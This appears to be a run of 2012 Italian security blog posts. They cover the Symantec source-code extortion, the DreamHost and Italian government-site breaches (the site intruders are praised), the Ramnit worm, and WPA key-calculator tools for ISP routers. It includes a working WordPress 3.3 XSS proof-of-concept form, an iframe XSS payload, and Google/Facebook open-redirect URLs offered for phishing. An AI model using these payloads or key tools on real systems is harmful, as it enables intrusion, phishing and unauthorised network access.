L’unica comunicazione ufficiale che venne fatta in merito fu da parte di un rappresentate Symantec che rilasciò le seguenti informazioni intervistato dalla rivista CNET:

In January an individual claiming to be part of the ‘Anonymous’ group attempted to extort a payment from Symantec in exchange for not publicly posting stolen Symantec source code they claimed to have in their possession. Symantec conducted an internal investigation into this incident and also contacted law enforcement given the attempted extortion and apparent theft of intellectual property. The communications with the person(s) attempting to extort the payment from Symantec were part of the law enforcement investigation. Given that the investigation is still ongoing, we are not going to disclose the law enforcement agencies involved and have no additional information to provide.

Ieri sera è stato pubblicato a questo link uno scambio email tra un dipendente Symantec, Sam Thomas, e tale Yamatough, appartenente al gruppo in possesso del codice in cui si evidenzia un tentativo di estorsione ai danni della stessa Symantec.

Lo scambio email è andato avanti per tutto il mese scorso e a leggerlo dall’inizio appassiona quanto un buon thriller.

I primi scambi email fanno intuire che già dal 18 Gennaio scorso gli hacker, nella persona di Yamatough, avevano avanzato richieste economiche per evitare il rilascio o la vendita del codice sorgente in loro possesso. La cifra richiesta è di 50.000 dollari!

Da quel momento Symantec avanza alcune domande per determinare se è vero che loro sono in possesso del codice, chiedendo di mandargli alcuni file specifici, e di indicargli la path dove erano presenti.

Per problemi tecnici i file non sono mai arrivati ma le path si e pare questo sia bastato per determinare la veridicità di ciò che dicevano gli hackers. La Symantec comunque da quel momento si è attivata per cercare di allestire un server Ftp dove farsi trasferire i file ma tale operazione ha richiesto molto più tempo del previsto facendo innervosire un po’ gli hacker che subito hanno cercato di concludere iniziando a dare istruzioni su come effettuare i pagamenti.

I soldi dovevano essere inviati utilizzando la società Liberty Reserve con sede in Costa Rica.

Questa formula non è stata subito accettata da Symantec che ha cercato di trattare sia sul pagamento sia sul tipo di transazione. Hanno infatti proposto di inviare 1000 dollari tramite Paypal come gesto di buon auspicio per far capire che l’intenzioni erano comunque di pagare.

Yamatough ha rifiutato l’offerta e rendendosi conto che si cercava di perder tempo ha schiacciato sull’acceleratore ribadendo che il metodo di pagamento era quello e che in alternativa c’erano altre persone già interessate all’acquisto all’asta del codice. Ha ribadito che trattare prima con Symantec era una sorta di loro codice di onore che prevede di trattare con la “vittima” prima di divulgare le informazioni rubategli.

A questo punto Thomas cerca di far capire che si è attivato per far pervenire loro il pagamento ma essendo una grande Azienda non è facile mettere d’accordo tutti i boss, il reparto Finanza etc. e cerca sempre di perdere tempo proponendo un nuovo sistema di pagamento.

Il gruppo di hacker nel frattempo aveva iniziato a sospettare che tutto questo “prender tempo” fosse un tentativo di tracciare le conversazioni e ogni tanto, nei momenti in cui attendono risposta da Symantec, mandano email dicendo “salutate l’FBI per noi” o “non provate a tracciarci altrimenti diffonderemo subito il codice sorgente“.

Tutto questo scambio di email iniziato a Gennaio è arrivato fino alla mezzanotte di ieri sera quando il gruppo di hacker ha dato un ultimatum di 10 minuti a Symantec e successivamente ha pubblicato su Twitter il messaggio in cui annunciavano il rilascio del codice sorgente Symantec.

Di seguito l’ultimo scambio mail con Symantec, nella figura di Sam Thomas, che spiega di non poter prendere decisioni in 10 minuti.

Circa 4 ore dopo il sorgente Symantec era on line come riportato in questo altro annuncio contenente un link Torrent scaricabile da The Pirate Bay! Il file ha una dimensione di 1.2 GB ed è rinominato in  ”Symantec’s pcAnywhere Leaked Source Code“.

Per il momento non ci sono state dichiarazioni da parte di Symantec né di Liberty Reserve.

Aggiorneremo l’articolo non appena ci saranno sviluppi.

7/2/2012 21.06 – Symantec conferma che il codice pubblicato è il sorgente di pcAnywhere e si aspetta che nei prossimi giorni venga rilasciata la seconda metà del source code.

Il furto del codice ha interessato tutta la famiglia degli applicativi Symantec del 2006 ossia:

• Norton Antivirus Corporate Edition
• Norton Internet Security
• Norton SystemWorks (Norton Utilities and Norton GoBack)
• pcAnywhere

Al momento la vulnerabilità è nota solo per pcAnywhere e Symantec informa che chi ha avuto questo applicativo installato è stato esposto ad un rischio maggiore per tutto il tempo dell’attività del prodotto.

Tutti gli utenti di pcAnywhere sono quindi invitati a disabilitarlo o ad aggiornarlo all’ultima release.

Maggiori informazioni potete trovarle direttamente nel sito Symantec a questa pagina.

La vulnerabilità individuata da Stefan Esser consente di eseguire codice sulla macchina vittima con i privilegi dell’utente Web (remote code execution). Come riportato su SecurityTracker mandando dati manipolati al Php si può generare un errore nella memoria del php_register_variable_ex() consentendo di eseguire codice.

Per tutti coloro che amministrano Server è consigliabile provvedere ad aggiornare alla versione Php 5.3.10 quanto prima.

Qui trovate l’annuncio ufficiale di Php.

Recentemente sono state individuate alcune vulnerabilità tra le pagine dei Servizi di Google e FaceBook. Sono falle di tipo Open Redirect che permettono di effettuare un redirect senza necessità di manipolare stringhe o eseguire azioni particolari.

Open, infatti, sta ad indicare che il sito affetto da tale falla non effettua alcun controllo sull’input ed esegue il codice per cui è programmato sempre e comunque. Il vantaggio di poter sfruttare vulnerabilità come questa è quello di poter utilizzare url di domini di cui la gente non mette in dubbio la provenienza (Google appunto) per farli cliccare e redirettarli a siti di phishing o similari.

Immaginate l’utente medio che riceve un’email clone di Google che gli indica di cliccare  un  url del dominio “google.com” ed inserire i suoi dati per via di un qualche motivo plausibile. Quanti penserebbero che quell’url nasconda una minaccia?

In questo caso l’url affetto da tale vulnerabilità è appartenente al Servizio Google Accounts ed è il seguente:

https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.sitomalevolo.com

Allo stato attuale la falla è già stata risolta e provando un redirect verso capn3m0.org si ottiene un errore di “Bad Request”:

https://accounts.google.com/o/oauth2/auth?redirect_uri=www.capn3m0.org

Questa vulnerabilità è stata individuata da Ucha Gobejishvili aka longrifle0x che vanta solo nell’ultima settimana una serie di XSS in siti degni di nota: Google, Apple, Sony Ericcsson.

Sempre longrifle0x ha individuato una vulnerabilità XSS alla pagina delle Google App for Business. Per verificare la vulnerabilità è necessario andare all’url:

https://www.google.com/a/cpanel/premier/new3?hl=en

ed inserire nel campo “Domain” questo codice:

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

Qui il suo “curriculum”!

La seconda vulnerabilità, individuata da ZeRtOx del gruppo Devitel, riguarda FaceBook ed è sempre di tipo Open Redirect. Il codice è il seguente:

http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.sitomalevolo.com

e attualmente è ancora presente come dimostra il link che rediretta a capn3m0.org:

http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.capn3m0.org

Infine segnalo una terza vulnerabilità Open Redirect sempre per i Servizi di Google: Ad Services. I banner di Adsense sono associati ad un url fatto nel seguente modo:

http://www.googleadservices.com/pagead/aclk?
sa=L
&ai=BCN0tjMAhT9ijEq2Q0QXP1tm2BKGTn-sB4e7Th0fAjbcB8IQOEAEYASCZ0NoLOABQg7et0Pn_____AWD98vyD3BCgAYfM69oDsgEPd3d3LmNhcG4zbTAub3JnugEKMzM2eDI4MF9hc8gBBNoBUWh0dHA6Ly93d3cuY2FwbjNtMC5vcmcvZmlsZXNoYXJpbmctcG9zdC1tZWdhdXBsb2FkLWNoaXVzaS1maWxlc29uaWMtdXBsb2FkZWQuaHRtbIACAbgCGMgC4afaFKgDAfUDAAAgwPUDAAAAEIgGAaAGBA
&num=1
&cid=5GhoQFqmzEdFESSc_Vjf5Gxi
&sig=AOD64_2aoaqhlTxnKAENG806XtTTXpAjFw
&client=ca-pub-XXXXXXXXXXXXXXXX
&adurl=http://www.sitomalevolo.com

I parametri che riceve in input devono essere tutti corretti ad eccezione del campo adurl che invece viene valorizzato con il link verso cui vogliamo che rediretti.

Come potete immaginare trovare un link con tutti i dati corretti è molto semplice. Basta navigare tra i siti che mostrano banner di Google AdSense e copiarsi il link.

Quest’ultima falla l’ho trovata ispirato dalle due precedenti mentre scrivevo l’articolo. Se conoscete chi ne ha parlato prima di me segnalatemelo che provvederò a mettere l’autore.

L’azienda ha provveduto ad effettuare un cambio password massivo che ha richiesto un po’ più del previsto dato che attualmente DreamHost gestisce oltre 1 milione di siti web. DreamHost ha anche pregato i propri Clienti di cambiare le password delle caselle email utilizzate come riferimento su DreamHost.

A questo link è possibile vedere gli aggiornamenti effettuati in tempo record da DreamHost:

http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/

dove si può riscontrare che l’intervento di cambio password è ormai terminato.

Questo il testo dell’email inviata ai Clienti:

 IMPORTANT INFORMATION: We are writing to let you know that there may have been illegal and unauthorized access to some of your passwords at DreamHost today. Our security systems detected the potential breach this morning and we immediately took the defensive precaution of expiring and resetting all FTP/shell access passwords for all DreamHost customers and their users. There are three different types of passwords at DreamHost: a Web panel password (for logging in to the panel), e-mail passwords, and FTP/shell access passwords. Only the FTP/shell access passwords appear to have been compromised by the illegal access. Web panel passwords, e-mail passwords, and billing information for DreamHost customers were not affected or accessed. Refer to the following DreamHost status post for details:http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/

IMPORTANT ACTION REQUIRED:

1. To create a new FTP/shell access password for your DreamHost account, please log in to your DreamHost Web panel (https://panel.dreamhost.com/), select “Manage Users” in the top left, then select “Edit” next to each user, and type in a new password. Make sure you click “Save Changes” at the bottom of the page.

2. We are also requesting that you change your e-mail password. We are not enforcing this change at this time as we do not believe that e-mail passwords were compromised. However we strongly recommend that you change your e-mail password as a precaution. To change the passwords for your e-mail users or yourself, log in to the DreamHost panel at (https://panel.dreamhost.com/), select “Manage Email” in the top left, select “Edit” next to each e-mail user address, and choose a new password for each. Make sure you click “Save Changes” at the bottom of the page.

We sincerely apologize for any inconvenience this may cause. If you have any additional questions about this process, please contact us through the support page in the panel.

Note that DreamHost will never ask you for personal or account information in an e-mail. Please exercise caution if you receive any other e-mails that ask for personal information or direct you to a Web site where you are asked to provide personal information.

Sincerely,

The DreamHost Team

Come spiega Simon Anderson, CEO di DreamHost, in risposta ad un cliente:

our systems have stored and used encrypted passwords for a number of years, however the hacker found a legacy pool of unencrypted FTP/shell passwords in a database table that we had not previously deleted. We’ve now confirmed that there are no more legacy unencrypted passwords in our systems. And we’re investigating further measures to ensure security of passwords including when a customer requests their password by email (this was not the issue here, though). Re your shell accounts, I’d suggest that you select a new password just to be sure.

l’hacker ha avuto accesso ad una Tabella di un Database che per errore conteneva alcuni account Ftp e Shell non criptati che han poi permesso l’accesso a tutti i dati dei Clienti.

Per ora non ci sono state azioni/attacchi massivi verso gli account hackerati  e con il cambio password e la patch della vulnerabilità il problema dovrebbe essere risolto!

La protesta di internet negli ultimi giorni sta creando parecchi grattacapi ai sistemisti di Server “importanti”. La settimana scorsa l’Alpha_Team si era dichiarato al mondo rilasciando una lista di siti istituzionali di cui avevano violato i Database. Tra questi vari siti c’era “italia.gov.it” che dopo l’attenzione ricevuta da parte dell’Alpha_Team ieri è stata vittima di un secondo attacco di tipo DDOS questa volta firmato dal noto movimento di protesta on line Anonymous.

Come loro solito hanno pubblicato alcune delle informazioni sottratte dalle quali si riscontra che l’attacco anche in questo caso è stato di tipo Sql Injection. L’Alpha_Team non ha rilasciato informazioni in merito ma analizzando il dump a questo link si possono leggere l’information schema e alcuni records di varie tabelle del Database del sito della Banca.

Come potete vedere le Tabelle alle quali hanno avuto accesso sono tutte relative al sito e riguardano le varie aree dello stesso (le proposte on line, l’elenco delle news,etc) mentre altre sono invece a uso interno dei dipendenti/sistemisti come i dati di accesso delle caselle email o la lista degli utenti del sito, Administrator incluso.

Di queste notizie, come al solito, pochi parlano e le stesse vittime non comunicano nulla sull’attacco. Né sui loro siti né ai loro Clienti.

Se oltre questo fatto, già grave, si aggiunge che, come abbiamo visto nell’intervista all’Alpha_Team, le falle di sicurezza non vengono corrette di sicuro il quadro generale della sicurezza informatica in Italia non ne esce positivo. Almeno per quelle “grandi” società dove ci si aspetta che la sicurezza sia un punto di forza!

Proprio qualche giorno fa avevamo intervistato l’Alpha_Team, una crew di giovani ragazzi italiani che sfruttando una vulnerabilità Sql Injection aveva avuto accesso ed eseguito un dump sempre del sito italia.gov.it. A questo articolo potete trovare maggiori informazioni e il dump in questione.

Anonymous con il comunicato pubblicato stamani reperibile qui accusa il neo Governo Italiano di aver fatto bei discorsi ma pochi fatti:

Il nuovo governo si è presentato con l’aspetto frigido di chi non avendo mai praticato la politica dovrebbe risultare esente dalle tentazioni che noi italiani ben conosciamo.

Sventolando parole a lungo agognate quali equità, giustizia sociale e rigore. Ebbene di queste non s’è ancora vista l’ombra, escluso il contegno con cui vi presentate ai media. Sappiate che siete sotto osservazione da più parti, e che non basteranno quattro buoni propositi.

[...]

Anonymous e tutti i cittadini liberi e consapevoli non resteranno a guardare.

Con questo comunicato e per tali motivazioni Anonymous informa che tornerà all’attacco e, dopo il DDOS odierno lancia l’operazione #Operation Italy o #OpItaly per il giorno 13 Febbraio 2012. L’obiettivo dell’attacco non è stato ancora deciso e verrà reso noto solo poco prima tramite gli hastag Twitter indicati in precedenza come accaduto oggi.

Aspettiamo il 13 Febbraio e vediamo cosa succede.

Keep in touch.

Come immagine ho scelto la locandina del famoso film Hackers del 1995 che vede come protagonisti una crew di giovani ragazzi che un po’ per divertimento un po’ per passione portarono a termine attacchi di grande portata scombussolando una città e finendo nel mirino dell’Fbi. Il film, come si sa, è finzione, ma è stato di ispirazione per molti ragazzini che come me sognavano di diventare hacker o qualcosa del genere.

Il motto del film era:

their only crime was curiosity

(il loro unico crimine era la curiosità)

Conoscendo un po’ meglio i ragazzi del pr0_alpha_team mi è tornato alla mente e vediamo perché.

D #1: – Come nasce il pr0_alpha_team? E’ stata più una cosa tra amici tipo “vediamo fin dove riusciamo ad arrivare” o strutturata e organizzata?

L’Alpha_Team nasce come un gruppo di ragazzi (amici virtuali) , che sfida le infrastrutture che al giorno d’oggi dovrebbero essere le più sicure, cercando di far notare ai cari Italiani quanto siano vulnerabili i loro sistemi e come dati privati possano finire nelle mani di gente qualunque.

D #2 - Il nome pr0_alpha_team da dove proviene? Siete una versione “alpha” quindi ancora non ufficiale? cosa dobbiamo aspettarci?

Allora il nome Alpha_Team deriva dalla poca fantasia che avevamo quando ci siamo registrati su Zone-H, cosa dovreste aspettarvi? beh spero per noi che potremmo ancora divertirci nel cercare vulnerabilità

D #3 -  Guardando il vostro profilo su Zone-H si ha notizia di voi a partire da Novembre. Siete una crew “emergente” o operate da tempo ma solo ora volete rendere note le vostre azioni?

In precedenza abbiamo operato come singoli , ma poi un giorno abbiamo deciso di unirci e diventare l’Alpha_Team e rendere note le nostre azioni.

D #4 – Il vostro background? Siete “ethical hacker” anche come lavoro?

Siamo tutti studenti delle superiori ma in futuro vorremo sicuramente lavorare in quel campo, non ci definiamo hacker, ma solo appassionati informatici.

D #5 – Indipendenti o parte di un progetto più grande?

Siamo un gruppetto indipendente.

D #6 – Perché siti istituzionali? Quale messaggio volete mandare?

Attacchiamo siti importanti sia per divertimento sia per far capire ai nostri cari webmaster come sia facile sfruttare le loro mancanze. Per esempio nell’attacco alla Banca delle Marche volevamo far capire ai webmaster come sia stato facile per noi reperire informazioni sensibili.

D #7 – Fino ad ora le vittime illustri sono state violate con attacchi Sql Injection. E’ la tecnica che preferite o è quella a cui, come si è visto, erano vulnerabili tutte le vittime?

Perché in quei siti abbiamo trovato quel tipo di vulnerabilità.

D #8 – Il silenzio della stampa. I giornali latitano sempre quando l’attacco non è firmato Anonymous che “fa audience”. Cosa ne pensate di questa dis-informazione?

Pensiamo che al giorno d’oggi non ci sia dis-informazione ma solo poca voglia di reperire informazioni da utenti che utilizzano internet. Tutti dovrebbero sapere che rischi corrono navigando su internet.

D #9 – Il termine hacker ancora oggi viene usato in maniera errata e non si fanno mai distinzioni tra ethical, white hat, black hat, etc.. Voi come vi definite?

Siamo solo ragazzi appassionati di informatica.

D #10 – Il sito di una Banca, il sito dello store della Difesa… le vostre azioni hanno messo ancora una volta in rilievo le carenze tecniche in merito alla sicurezza informatica. In Italia spendere soldi per prevenire appare ancora una “cattiva abitudine” (purtroppo). Le vostre vittime se informate della violazione come han reagito? Le falle poi vengono sistemate?

Reagirebbero malissimo. Come possiamo vedere nel sistema bancario delle Marche ci troviamo di fronte ad un C.M.S. a pagamento, e credo che non lo abbiano pagato poco. No, le falle ad oggi sono come prima.

Concludendo questa intervista ne emerge ancora una volta la scarsa attenzione dedicata alla sicurezza informatica, dei nostri dati e delle infrastrutture che il nostro Paese presta ai suoi servizi più importanti o critici. Questi ragazzi, come ho premesso citando il film “Hackers“, sono solo appassionati e curiosi. I mezzi e le competenze li hanno e stanno dimostrando come uniti si possono raggiungere obiettivi importanti come il sito di una Banca o dell’Esercito. Non sono legati a nessun gruppo “famoso” e pertanto del pr0_alpha_team sono in pochi a parlare ma, come loro stessi hanno affermato, vogliono rendere note le loro azioni.

Sul tema della disinformazione fanno un’osservazione corretta dicendo che ai giorni d’oggi con internet a disposizione di chiunque è difficile pensare che la gente sia male o per niente informata. Almeno i giornalisti pagati per “informare” potrebbero provare a fare quello sforzo in più che noi non sempre abbiamo tempo o modo di fare.

Riguardo infine l’attacco al sito della Banca delle Marche (bancadellemarche.it) ci fanno sapere che nonostante i soldi spesi per un CMS risultato vulnerabile (può capitare eh, nessuno mette in dubbio che ci possano essere bug) non è stata ancora sistemata la falla. Sono queste le notizie che tra le tutte dovrebbero far riflettere. Possibile che una Banca dopo aver riscontrato delle violazioni nei propri dati non ne faccia notizia e neanche rimedia in tempi brevi?

Errare è umano, ma perseverare è diabolico..

Guardando l’archivio degli hack del pr0_alpha_team sul sito Zone-H si vede che da Novembre 2011 ad oggi hanno già operato numerosi attacchi verso siti di Comuni e similari.
Questo ultimo è degno di nota dato che, come indicato, si tratta di vittime illustri dalle quali sono state sottratte informazioni dai loro Database.

L’attacco è stato possibile grazie ad una vulnerabilità di tipo Sql Injection che ha permesso di ottenere pieno accesso ai database e di effettuarne un Dump degli stessi.

A dimostrazione di ciò i membri della crew hanno reso disponibili alcuni stralci dei Database violati:
- Dump Db Italia.gov.it
- Dump Db Bancamarche.it
- Dump Db Ufficio Italiano Brevetti
- Dump Db Università di Siena

Come fa giustamente notare Luca Mercatanti gli attacchi verso siti istituzionali o verso Banche mettono ancora una volta in evidenza l’incompetenza e la superficialità con cui viene gestita la sicurezza informatica nel nostro paese. Altra cosa allarmante è come non sia stata data alcuna notizia di questa azione. Probabilmente il sito di una banca violato non è cosa importante per i nostri giornalisti.

Leggendo la loro pagina Twitter si deduce che non si fermeranno quindi non resta che aspettare e vedere quali altri siti verrano colpiti.

Complimenti al pr0_alpha_team!

]]> http://www.capn3m0.org/siti-istituzionali-violati-pr0_alpha_team.html/feed/ 1 http://www.capn3m0.org/facebook-hacker-cup-2012.html http://www.capn3m0.org/facebook-hacker-cup-2012.html#comments Fri, 06 Jan 2012 17:41:13 +0000 capn3m0 http://www.capn3m0.org/?p=4156 Anche quest’anno è partito il Facebook Hacker Cup 2012. Si tratta di un contest organizzato da Facebook  rivolto a tutti gli hacker del mondo che dovranno sfidarsi in 5 round per risolvere algoritmi.

I primi 3 round si terranno on line nelle seguenti date:

• 1° Round – dal 20 al 23 Gennaio – 72 ore a disposizione
• 2° Round – il 4 Febbraio – 3 ore a disposizione
• 3° Round – l’11 Febbraio – 3 ore a disposizione

I 25 più veloci ed efficienti che risolveranno almeno un problema per round si guadagneranno l’accesso alle finali che si terranno nell’Head Quarter di Facebook a Palo Alto (California).

I 25 finalisti saranno totalmente rimborsati da FaceBook con 100 Dollari mentre ai primi 3 finalisti andranno i seguenti premi:

1. Vincitore – 5000 dollari
2. Secondo classificato – 2000 dollari
3. Terzo classificato – 1000 dollari

Per maggiori informazioni fare riferimento a questo link.

Ramnit era stato già usato in passato dai cybercriminali per sferrare attacchi che avevano portato al furto di migliaia di account bancari o di aziende/servizi noti.

Ultimamente è stato nuovamente utilizzato per rubare account Facebook e per ora le stime indicano che questi cybercriminali sono in possesso di 45mila account Facebook e si prevede che continui a diffondersi.

La maggioranza dei Pc infetti da Ramnit sono dislocati tra Inghilterra e Francia e gli addetti ai lavori comunicano che circail 17% delle nuove infezioni da virus rilevate in rete sono a causa sua.

L’attacco si manifesta in un link postato sulla nostra bacheca Facebook da parte di qualche nostro amico “già infetto”. Se, quindi, vi capita di trovare postati sul vostro profilo Facebook video o links che non dovrebbero riguardarvi/interessarvi cancellateli senza andare a visualizzarli. Visionandoli si verrebbe redirettati ad un sito malevolo che in maniera nascosta infetterebbe il nostro Pc.

Alla fine del 2011 i ricercatori avevano stimato che i Pc infettati da Ramnit erano circa 800 mila. Il funzionamento è quello tipico dei Worm. In questo caso i pc infetti non lamentano anomalie di funzionamento ma in background restano in ascolto di comandi da parte del Server Ramnit gestito dai cybercriminali. Questi in qualsiasi momento possono inviare comandi a tutti i Pc infetti (zombies) per eseguire azioni come appunto l’invio dei propri dati di accesso salvati sul Pc, il click su un particolare link o qualsiasi altro comando.

Se una volta i virus erano finalizzati a creare disservizi e malfunzionamenti alla singola postazione infetta, con l’avvento della Rete il concetto di virus si è ridefinito e ora i singoli Pc non sono considerati “vittime” ma  “strumenti” tramite cui il virus agisce.

800mila Pc pronti ad eseguire una singola azione possono aprire porte a guadagni o attacchi di vasta scala che una volta, il singolo hacker o gruppo di hacker, non era in grado di realizzare proprio per una questione di infrastrutture. Fare un Denial Of Service verso una grande azienda in Rete era difficile poiché si necessitava di un numero di Pc e di una quantità tali di Banda da saturare quella del Server. E qualche amico con qualche Pc non potevano riuscire nell’impresa. Con i virus che danno la possibilità di comandare tutti quelli infetti in un solo click il problema è stato risolto. Lo stesso vale per le azioni volte a guadagnare. Ci conosce AdSense o  altri Servizi di guadagno on line saprà che non è possibile (o quasi) creare fake link per far aumentare le nostre entrate. Pensate a 800mila Pc diversi che cliccano il vostro banner! Agli occhi di Google saranno 800mila persone diverse e quindi saranno tutti click validi e pagati. Questi sono solo alcuni esempi per spiegare perché i virus attuali non sono più interessati a danneggiare o creare disservizi.

Tornando a Ramnit consiglio a tutti quelli che pensano di essere stati vittima del worm di effettuare una scansione con l’Antivirus aggiornato e un cambio password dell’account Facebook ma anche di tutti gli altri eventuali Servizi nei erano usate le stesse credenziali.

Per via di tutti i servizi a cui siamo iscritti per evitare di avere tante password diverse siamo soliti utilizzarne una per tutto. Di questa tendenza sono al corrente anche i cybercriminali e qindi proveranno i dati Facebook rubati per accedere anche per altri Servizi noti (Gmail, Yahoo,YouTube,Account Ftp,Corporate SSL VPN, Outlook Web Access, etc.). E’ quindi consigliabile cambiarle tutte.

Solitamente l’accesso a questi altri Servizi diversi da FaceBook viene utilizzato per diffondere il virus tramite altri canali (mandando mail alle rubriche, inserendo codici malevoli nei propri siti web gestiti via Ftp, etc.).

Consiglio inoltre di diffidare da link inviati da amici che sappiamo risiedere in Francia o Inghilterra dato che c’è maggiore probabilità che loro o i loro amici possano essere infetti.

Aggiornate i vostri Antivirus e diffidate dai post su FaceBook che non vi convincono!

Ai seguenti link trovate la scheda dettagliata (e le istruzioni per la rimozione) di questa ultima versione di Ramnit:

• McAfee
• Microsoft Security Portal

Praticamente per eseguire l’exploit è necessario per prima cosa pubblicare un commento sul WordPress vittima.

Una volta fatto ciò è necessario creare una pagina contente il seguente codice e pubblicarla in un proprio spazio Web.

<html>
<title>Wordpress 3.3 XSS PoC</title>
<body>
<form name="XSS" id="XSS" action="http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="replace me"/>
<input type="hidden" name="email" value="replace me"/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="comment" value="replace me"/>
<input type="hidden" name="submit" value="Post Comment"/>
<input type="hidden" name="comment_post_ID" value="replace me"/>
<input type="hidden" name="comment_parent" value="0"/>
<input type="button" value="Click Me" />
</style></form>
</body>
</html>

Al posto di “replace me” vanno inseriti gli stessi dati usati nel precedente commento e al posto di “http://192.168.1.102/wordpress/” va inserito il riferimento del sito vittima.

A questo punto basterà cliccare sul tasto “Click me” e lo script provvederà nuovamente a pubblicare il post. Trovandolo già pubblicato genererà un errore di cotenuto duplicato ma il codice Javascript inserito nel “form action” della nostra pagina verrà eseguito.

Nell’esempio il codice Javascript da eseguire era il seguente:

<script>document.write(Date())</script>

che serve a visualizzare la data di sistema e, come si vede dalla seguente immagine,viene correttamenete eseguito dimostrando la vulnerabilità XSS.

In attesa di sviluppi e di una patch credo sia utile attivare temporaneamente un captcha o similare per i commenti così da evitare o almeno diminuire la possibilità di venire attaccati.

Link di riferimento

Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 – The Hackers News
Sorgenti Pastebin.com

L’utente swsooue l’ha pubblicato tramite il Forum della Community WifiShark in questo post.

In questa ultima versione del Teletu Wpa Finder sono stati aumentati i macig numbers e di conseguenza sarà possibile calcolare le chiavi Wpa di un numero maggiore di SSID.

Potete effettuare il download dal seguente link:

TeleTu Wpa Finder 1.3 DOWNLOAD

Ringraziamo la community WifiShark per la passione e la dedizione nello studio delle reti Wireless.

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

La sigla GCHQ non ci ricorda molto ma nelle ultime ore ogni blog o sito addetto ai lavori ne parla e ne ride.

Il GCHQ altro non è che il Government Communications Headquarters, ossia l’agenzia inglese per lo spionaggio delle comunicazioni che lavora a stretto contatto con i Servizi Segreti MI5 e MI6 per proteggere, monitorare e intervenire per la sicurezza dell’Inghilterra e dei suoi cittadini, in primis la Regina!

Dal nome e da questa breve descrizione ci si aspetta un team dei migliori hackers inglesi che giorno e notte veglia sulla vecchia Inghilterra per evitare che qualcuno decida di attaccarla o creargli problemi. Per fare ciò hanno bisogno di nuovi analisti e perciò, in gran segreto, hanno deciso di indire un concorso dal nome “Can you crack it?” dove solo chi riesce a risolvere l’enigma può avere accesso all’area dove si lasciano i propri dati e ci si candida per l’offerta di lavoro.

Il “concorso” è a tempo, dura 10 giorni (nel momento in cui scrivo mancano ancora 8 giorni e 16 ore) e consiste nel decriptare un codice partendo da una tabella di coppie di valori esadecimali.

Questa l’home page del sito:

Il motivo per cui tale notizia continua a far scalpore è dovuto al fatto che con una semplice ricerca su Google è stato possibile bypassare la pagina iniziale ed arrivare direttamente a quella dove lasci i dati per candidarti all’offerta di lavoro.

Per trovarla è bastato eseguire la più semplice delle ricerche di Google:

inurl:canyoucrackit.co.uk

e tra i primi risultati si ottiene l’url:

http://www.canyoucrackit.co.uk/soyoudidit.asp

che porta direttamente alla pagina di congratulazioni.

Una svista non da poco per chi dovrebbe difendere la Regina!

Dopo la scoperta la pagina è stata tolta dall’indicizzazione di Google ma ormai la notizia era arrivata alle orecchie di tutti.

Per chi volesse mettere alla prova le sue abilità cercando in Internet potrà trovare molte informazioni su come effettuare il decrypt corretto dell’esercizio

Qui trovate la soluzione, invece!

In questa prima versione sono presenti tutti i Magic Numbers aggiornati a Settembre 2011 ed è possibile calcolare la Wpa sia inserendo il solo SSID Alice (Es. Alice-12345678) sia inserendo SSID più Mac Address del Modem.

Per ora vi invitiamo a testare il nostro tool per il calcolo delle Wpa Alice direttamente online e qualora dovessero verificarsi anomalie o errori contattateci.

PROVATELO QUI

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Il tool è stato pubblicato a questo link e per l’occasione abbiamo provveduto a ri-organizzare il Menu in alto. Allo stato attuale è stata creata la voce Tools nel quale sono stati raggruppati tutto ciò che è abbiamo sviluppato in questi anni.

Al momento troverete:

- Fastweb Wpa Calculator On Line per il calcolo delle chiavi Wpa dei Router Fastweb

- Md5 Encrypt/Decrypt Tool per criptare e decriptare gli hash MD5 usati prevalentemente per le passwords

- Wp-users-page plugin per WordPress per generare la lista dello Staff

A breve provvederemo a sviluppare anche lo script per il calcolo on line delle chiavi Wpa di Alice e di TeleTu.

Per ora vi invitiamo a testare il nostro tool per il calcolo delle Wpa Fastweb direttamente online e qualora dovessero verificarsi anomalie o errori contattateci.

PROVATELO QUI

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Questa versione rispetto alle precedenti grazie all’aggiornamento del file “config.txt” permetteva di analizzare un numero maggiori di reti che fino a qualche tempo fa non permettevano di calcolare la chiave Wpa.

La nuova versione di cui andiamo a parlare oggi, rilasciata da qualche ora, è la versione 1.7 del Wpa Tester e integra il supporto al calcolo delle reti del Provider TeleTu finora rimasto in secondo piano.

Per quanto riguarda il cracking delle reti Alice e Fastweb non è stato aggiornato nulla pertanto l’unica vera differenza rispetto alla precedente versione è appunto il supporto a TeleTu.

Ancora una volta ringraziamo Francesco Pompili per il suo lavoro nello sviluppo di Wpa Tester.

Wpa Tester 1.7 DOWNLOAD

